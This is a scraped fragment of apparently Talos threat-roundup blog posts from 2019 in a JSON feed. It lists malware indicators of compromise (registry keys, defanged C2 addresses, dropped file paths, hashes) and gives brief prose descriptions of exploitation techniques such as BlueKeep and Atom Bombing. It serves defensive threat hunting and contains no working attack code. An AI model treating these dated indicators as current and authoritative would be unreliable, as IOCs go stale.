AMP\n\n[](<https://1.bp.blogspot.com/-pB5aFhwb7bE/XbxfE89Fl2I/AAAAAAAAC4s/MbaVn96IVYg87L3yZWyxIEzW_J9dqck_QCLcBGAsYHQ/s1600/852ca255c72851fff39129f7e4ad946e28c1c3adfe73f099d034b511d0d4f0ab_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Shade-7357624-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xi ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Client Server Runtime Subsystem ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xVersion ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32 ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shst ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: sh1 ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shsnt ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xstate ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xcnt ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\DEBUG \nValue Name: ExceptionRecord ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xmode ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xpk ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\HOMEGROUP\\UISTATUSCACHE \nValue Name: OnlyMember ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: CleanShutdown ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APPLETS\\SYSTRAY \nValue Name: Services ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NLASVC\\PARAMETERS\\INTERNET\\MANUALPROXIES ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Drive Type ` | 6 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`76[.]73[.]17[.]194` | 5 \n`131[.]188[.]40[.]189` | 5 \n`208[.]83[.]223[.]34` | 4 \n`171[.]25[.]193[.]9` | 4 \n`86[.]59[.]21[.]38` | 3 \n`193[.]23[.]244[.]244` | 3 \n`194[.]109[.]206[.]212` | 3 \n`154[.]35[.]32[.]5` | 3 \n`128[.]31[.]0[.]39` | 3 \n`83[.]142[.]225[.]126` | 1 \n`137[.]74[.]19[.]202` | 1 \n`195[.]154[.]237[.]147` | 1 \n`81[.]17[.]17[.]131` | 1 \n`198[.]16[.]70[.]10` | 1 \n`5[.]9[.]116[.]66` | 1 \n`62[.]151[.]180[.]62` | 1 \n`193[.]105[.]73[.]80` | 1 \n`176[.]31[.]103[.]150` | 1 \n`194[.]59[.]207[.]195` | 1 \n`146[.]185[.]189[.]197` | 1 \n`144[.]76[.]143[.]137` | 1 \n`87[.]193[.]208[.]14` | 1 \n`98[.]128[.]172[.]233` | 1 \n`87[.]121[.]98[.]43` | 1 \n`141[.]157[.]13[.]229` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\README1.txt` | 12 \n`\\README10.txt` | 12 \n`\\README2.txt` | 12 \n`\\README3.txt` | 12 \n`\\README4.txt` | 12 \n`\\README5.txt` | 12 \n`\\README6.txt` | 12 \n`\\README7.txt` | 12 \n`\\README8.txt` | 12 \n`\\README9.txt` | 12 \n`%ProgramData%\\System32\\xfs` | 11 \n \n#### File Hashes\n\n` 26da7d57ec1798ddcdc4f016f4eb0752a6e1ecd5481091dc523ea01175093d8d 2a68d908566be84208cdb2f8f7d91e333690f9caee7e3f2e910483612c5a5046 5d7a85f85865277795519e6e7b5f656cf9904ed6dcdbb6d901482c47594cea7b 68daf44d57a4d13701eb66b637a00cc6931fb913515a7c95dec3a318c0365968 6f387364a1ebaebef7dc40f5bc1bf8200206b140e27050ff3f41fe6fb46c6b7f 7699113e80abe023018877fd18e3b39a29b26a21cd7dfcef06cbe9c0f9595cff 9714f035f6458b4496dd0e1362eded1eca6214ee35768b1e2f615124671b52e3 985418b9d311ec5b3f386204c2f65342856b90c5617fcbb1bf50bf1ae13ec3f1 b7005d089d4e060ea4528dbca67236924bb2310c0b214d3f74e0961effda7da4 b9bd26c9291c769620dd003b63619c10b741495bbef133d488dc877634cda0bc d48ef74859fc77868492c43758d01f618c2af1d007e570d3848fe1d5a246e10c deaa2c5a65617ca09fd4d84a268febc8ecdd660307a5fe576bbd10833d045de1 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-UCq2LBdJiG4/XbxhYZ7RguI/AAAAAAAAC44/JS8SudPVLcgtFwDOqZDqex713wrb-3gPwCLcBGAsYHQ/s1600/68daf44d57a4d13701eb66b637a00cc6931fb913515a7c95dec3a318c0365968_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (57939) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (2838) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nKovter injection detected \\- (410) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nExcessively long PowerShell command detected \\- (354) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nProcess hollowing detected \\- (313) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (137) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (95) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (93) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nPowerShell file-less infection detected \\- (46) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nFusion adware detected \\- (29) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "cvss3": {}, "published": "2019-11-01T10:31:45", "type": "talosblog", "title": "Threat Roundup for October 25 to November 1", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-11-01T10:31:45", "id": "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/bUEZpje_8WQ/threat-roundup-1025-1101.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-09T21:34:08", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 2 and Aug. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d4dc7d3de3f5.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Swisyn-7105182-0 | Malware | Swisyn is a family of trojans that disguises itself as system files and services, and is known to drop follow-on malware on an infected system. Swisyn is often associated with rootkits that further conceal itself on an infected machine. \nWin.Worm.Phorpiex-7104335-2 | Worm | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide-range of payloads, from malware to send spam emails to ransomware and cryptocurrency miners. \nWin.Malware.Zusy-7102354-1 | Malware | Zusy is a trojan that uses Man-in-the-Middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe\". When the user access a banking website, it displays a form to trick the user into submitting personal information. \nWin.Worm.Brontok-7102096-1 | Worm | Brontok is an email worm that can copy itself onto USB drives. It can change system configuration to weaken its security settings, conduct distributed denial-of-service attacks, and perform other malicious actions on the infected systems. \nWin.Worm.Socks-7102087-0 | Worm | Socks is a generic worm that spreads itself via autorun.inf files and downloads follow-on malware to infected systems. \nWin.Malware.Formbook-7102043-1 | Malware | Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard. \nWin.Malware.Tofsee-7101989-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Malware.Chthonic-7101817-1 | Malware | Chthonic is a banking trojan derived from the Zeus family of banking malware. It is typically spread via phishing emails and attempts to steal sensitive information from an infected machine. Chthonic has also been observed downloading follow-on malware such as Azorult, another information stealer. \nWin.Malware.Remcos-7101023-0 | Malware | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Swisyn-7105182-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Type ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ErrorControl ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ImagePath ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: DisplayName ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: WOW64 ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ObjectName ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Description ` | 9 \nMutexes | Occurrences \n---|--- \n`xinduanyou` | 9 \n`Global\\aca756c1-b9e5-11e9-a007-00501e3ae7b5` | 1 \n`Global\\ad6324e1-b9e5-11e9-a007-00501e3ae7b5` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ZFT[.]QBAIDU[.]INFO` | 5 \n`che[.]qianma[.]info` | 4 \nFiles and or directories created | Occurrences \n---|--- \n`\\SfcApi` | 9 \n`%SystemRoot%\\inf\\oem13.PNF` | 9 \n`%SystemRoot%\\inf\\oem13.inf` | 9 \n`%SystemRoot%\\LastGood\\TMP4.tmp` | 9 \n`%SystemRoot%\\LastGood\\system32\\DRIVERS\\winyyy.sys (copy)` | 9 \n`%SystemRoot%\\Temp\\OLD5.tmp` | 9 \n`%SystemRoot%\\inf\\INFCACHE.0` | 9 \n`%SystemRoot%\\inf\\INFCACHE.1 (copy)` | 9 \n`%SystemRoot%\\stin.bat` | 9 \n`%System32%\\DRIVERS\\winyyy.sys (copy)` | 9 \n`%System32%\\drivers\\SET3.tmp` | 9 \n`%System32%\\drivers\\SET6.tmp` | 9 \n`%SystemRoot%\\winsys.exe` | 9 \n`%SystemRoot%\\winsys.inf` | 9 \n`%SystemRoot%\\winyyy.sys` | 9 \n`%SystemRoot%\\SMSS.bat` | 8 \n`%SystemRoot%\\lsass.exe` | 8 \n`%SystemRoot%\\winhost.exe` | 8 \n`%SystemRoot%\\SysWOW64\\SMSS.bat` | 1 \n`%SystemRoot%\\SysWOW64\\lsasys.exe` | 1 \n`%SystemRoot%\\SysWOW64\\winhost.exe` | 1 \n`%System32%\\SMSS.bat` | 1 \n`%System32%\\lsasys.exe` | 1 \n`%System32%\\winhost.exe` | 1 \n \n#### File Hashes\n\n` 0f502626053f598a870375325ba7f7c81c2a791d0fd2401d4d6bd27c784b5f90 37e5a76ef3b1de92c162fb42b6e783a9734ccb1d4f61e1252ec9a8aba6417ca2 64b2a00a400501b742eb336eceee3a398b418315ed676e37e4d4f3fc7ab76e2c 722449fd99d698856b809df09e75e79ec4cee7840960e3df72a8ceb3d954134c 729d483257c6907c3f423d344f2cb5c9a78a899455ef246fc033c965043272bb 96d5ea254ca506622c2c70c4bcb8594c62a20db7ce9552deb302166bda37b226 b784fc881fb56dceeaad3afbad770a3c76eaa1acc389877be514af02413c06e7 d8318b7b34f4662ee8b6b537ee08f763ffb7d2c4794b722561d305db65c6fc5f da0c26355fd7abdd3683beb7ab9f96efdec52207c150664bd177de4d794e6a53 de782ca97daf89c1208ea57618498de7aaa6f4ddbbc9794f3491dc947cca8cc3 e4aeeaf8b385bfccc637411b5030ab6c91a289cff425a14953e6549073478aa0 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ajlIu0FYI9E/XU3L9-R0w0I/AAAAAAAACSY/aBJBUgQnH1Uv1y2g0CPGmKSxXP3HWi94QCLcBGAs/s1600/d8318b7b34f4662ee8b6b537ee08f763ffb7d2c4794b722561d305db65c6fc5f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pjqrtZHB_jA/XU3MOx0rp_I/AAAAAAAACSg/fHnank7YJ80mC9cHYud--e4jjow9m_yigCLcBGAs/s1600/64b2a00a400501b742eb336eceee3a398b418315ed676e37e4d4f3fc7ab76e2c_tg.png>)\n\n \n\n\n \n\n\n### Win.Worm.Phorpiex-7104335-2\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\M-5050402520507690204050\\winmgr.exe ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Manager ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Manager ` | 15 \nMutexes | Occurrences \n---|--- \n`t1100` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`195[.]22[.]26[.]248` | 15 \n`199[.]247[.]8[.]13` | 15 \n`208[.]100[.]26[.]250` | 14 \n`216[.]218[.]206[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`srv1300[.]ru` | 15 \n`srv1000[.]ru` | 15 \n`srv1100[.]ru` | 15 \n`srv1200[.]ru` | 15 \n`srv1400[.]ru` | 6 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 15 \n`\\Secret.exe` | 15 \n`\\Documents.exe` | 15 \n`\\Pictures.exe` | 15 \n`\\505050.exe` | 15 \n`\\Movies.exe` | 15 \n`\\Music.exe` | 15 \n`\\Private.exe` | 15 \n`\\windrv.exe` | 15 \n`E:\\autorun.inf` | 15 \n`E:\\Secret.exe` | 15 \n`E:\\505050.exe` | 15 \n`E:\\Documents.exe` | 15 \n`E:\\Movies.exe` | 15 \n`E:\\Music.exe` | 15 \n`E:\\Pictures.exe` | 15 \n`E:\\Private.exe` | 15 \n`E:\\windrv.exe` | 15 \n`%APPDATA%\\winmgr.txt` | 15 \n`D:\\autorun.inf` | 15 \n`%SystemRoot%\\M-5050402520507690204050` | 15 \n`%SystemRoot%\\M-5050402520507690204050\\winmgr.exe` | 15 \n \n#### File Hashes\n\n` 45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52 4890d7aa8b302210932dacef3a0452ada7ee9c6565b1175f75925915e6036331 4ae81c49804d96d6913fc91ec79c77c0a16f09a5628cd9e6365bb621217ed3c9 5327d5502aa0e6cb6456809fc27cfcd1b0830a9cfd337d2a9493ec47a2eb6530 81489692294fa6e70b73f959a30a7bdd684141a72d3153b409f45173753acb82 8b66de0f1099ff243fbea1782c0ab7566bb9a201818d7793641e797c52067cab 8c03c0f22d09ba5384b804eced1c56e74f6c6df97d35a21f0d596dc2c80e5f5c 90b7e12af41916b8c82d0d83f6073e5bbc95f3c4ff1fd29391d50e7115967460 a0287b2bc66e1f6695d9c7e4ad6f70e8b1099f3f4b9761a4428e8ff02b173962 a80da89dfba6049d759500b272030ea7a97ab0d7cbe386456ddb65fa24b7f738 ce79b0e5a78be79315d2f20c6998812b75f4b95646d457034b4a534467e71558 d3da28644ddeaa70d828a659e27b83abcc284e578a62c26d1a4efc418cdac942 d6a90b5ff319cf5eb51d7b202c77e7e8037d2b160b80807e027ceb2e9834a29e d8797103159c7ebf48b8ff67033f61866b1e46f70f82a91ce33b8afe27f0252e e571c9202cd58870434c981bc0cf546473c446145d77362b1fdf7eb75f18400c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4gCuLjJZARg/XU3M0QenW_I/AAAAAAAACSs/TQl5RkYJBtswmAhtQ723UfoeHGlhirINwCLcBGAs/s1600/45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-jqgxgbtThtU/XU3M6tGW1KI/AAAAAAAACSw/uyMy5CFE3E4Yeui93PYEdMj_7C8OQEzRgCLcBGAs/s1600/45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52_tg.png>)\n\n \n\n\n \n\n\n### Win.Malware.Zusy-7102354-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: F5DBF765 ` | 20 \nMutexes | Occurrences \n---|--- \n`F5DBF765` | 25 \n`\\BaseNamedObjects\\5145C9BD` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]218[.]185[.]162` | 23 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ynefefyopqvu[.]com` | 17 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\5145C9BD\\bin.exe` | 23 \n`%HOMEPATH%\\AppData\\LocalLow\\F5DBF765` | 22 \n`%APPDATA%\\F5DBF765` | 21 \n`%APPDATA%\\F5DBF765\\bin.exe` | 20 \n \n#### File Hashes\n\n` 03e74e58f2aed047d6bac9bde066206c64d3e48a4c865d86e29bc62edbb19c77 0eb478d5757cb872b80386250de948ac3abc76b5ebf0d7f2ab38f6a6ad95479c 0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad 1ed3291baf7d32ab690b56f430399d7c46d261176c5b05b3cf8f2cdd1f9a4681 2828b72f4856b8054ff75af987aa43d84f2d42405979c99e89e6082afc47d6da 2bcd2e02bf0cefed898990ae64791f9c294c50695542e2cf0e073c1f12dfed94 2bf93320c70c222aa89db3df81845d9277dc8eb7ff764b63f5ad4c5b78839557 2ecbe3620a6f08eadaf5c14aa35b2975b07ee41827f7004b692a7508b6a3c1a5 354d64a310cc3ce7a957c29f8654201ee0e79237609172e746aa25b5e038b837 3776eb64c25acfc28fd35fe6a123a0b4b1e0ee7e4ff2cde20169f1a914c01df1 39627480021a400069ee270b040601af19aaaf669bc6db2bf64058e14fb13875 3d0a697fec4326426bf22ae6b848700a3274c55767fb18a8e0748fc7f3024597 3e7ed99b45129a136287f785dffb67b044da28fd2232190fafc30c759c447a96 460de49bf98a472753462a9264bf40ea24b95fa667f3b8d7d010ca3fa94b715a 47e8ec99e3c0bb7526b381db1bec98b13df1deb95c56868703309bf4979155d2 48a0d3749139aebb4d435db7158aa1916e4d305139d3db168c795c68b9431ed6 4c46b50c94ad30df7661d5be4eaf3da8ed1f8f1924fa25f0b87f9e2bc5b21dc8 4cad121b0408001868b22b92d7def0a3125efe64ebd5d28bfbd933395fecf512 5ecd70109eec90c8ac0869398a4da72f9264ef5f3f61f2be883456ddd9bc6a32 62a2d6d129e578279b691542eea61040212cc4f26855beecd991118343d081cf 62afaeae9d1bc8473416423c46423951eb35cac6927798f6d9967a8fb358af2a 6b2d254b662c18e9a23fead0e661587c3f46b8fc8fac940fedb13e4e2b3d8bd6 6f3c9f7a94b4f3a3ecf29bcd646a55bb3d286ffd20b98fe2d984594dd73dbb5e 72683fb9644dbdc7d2fc1ba436d7f7379f2ce86fe3dac5431d29160abff07755 72c16952c7f016b6bbac0e1cc243aec6d9eacb1c1db8c3f744499584672580e5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-aD_k9wBvi7w/XU3OYgRNxzI/AAAAAAAACTE/3w3xcf2QATk_BEJh8RtyvkiiDtllPMsBgCLcBGAs/s1600/0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-cpk0yyrdwN4/XU3OPhFRCgI/AAAAAAAACTA/rC6sU_cduvklwg5FVfCZE2U4ofFcwgt-gCEwYBhgL/s1600/0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-0irmTmU9_zU/XU3PF6lOpfI/AAAAAAAACTQ/2MVcL7sl9Gc2HccPLyTh_K3HnilzUwjRgCLcBGAs/s1600/03e74e58f2aed047d6bac9bde066206c64d3e48a4c865d86e29bc62edbb19c77_umbrella.png>)\n\n \n\n\n \n\n\n### Win.Worm.Brontok-7102096-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: ScreenSaverIsSecure ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: ScreenSaveTimeOut ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoTrayContextMenu ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CABINETSTATE \nValue Name: FullPathAddress ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: HideFileExt ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoViewContextMenu ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableRegistryTools ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: DisallowRun ` | 25 